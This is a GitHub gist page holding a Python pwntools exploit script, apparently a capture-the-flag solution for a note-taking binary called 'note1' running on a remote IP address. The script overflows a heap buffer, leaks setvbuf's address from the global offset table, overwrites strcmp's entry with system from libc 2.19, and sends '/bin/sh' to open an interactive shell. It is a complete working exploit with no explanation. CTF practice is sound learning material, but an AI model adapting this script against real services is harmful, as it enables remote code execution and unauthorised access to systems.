Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
# coding=utf8
from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep
# p = process('./note1')
p = remote('115.28.27.103', 9001)
elf = ELF('./libc-2.19.so')
strcmp_got = 0x602048
setvbuf_got = 0x602060
system_offset_to_setvbuf = elf.symbols['system'] - elf.symbols['setvbuf']
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('2')
p.sendline('2')
p.sendline('2')
p.sendline('1')
p.sendline('3')
p.sendline('3')
p.sendline('3')
# edit the first note to make heap overflow then leak stack address(setvbuf)
p.sendline('3')
p.sendline('1')
p.sendline('A' * 280 + p64(setvbuf_got - 0x70) + '2')
p.sendline('2')
p.recvuntil('content=')
p.recvuntil('content=')
p.recvuntil('content=')
setvbuf_addr = unpack('Q', p.recv(6) + '\x00'*2)[0]
print '[*] setvbuf_addr: ' + hex(setvbuf_addr)
# edit the second note to modify the strcmp_got to system
p.sendline('3')
p.sendline('2')
p.sendline('A' * 280 + p64(strcmp_got - 0x70) + '3')
p.sendline('3')
p.sendline('\x00')
p.sendline(p64(setvbuf_addr + system_offset_to_setvbuf))
# trigger strcmp
p.sendline('3')
p.sendline('/bin/sh')
sleep(0.1)
p.clean()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment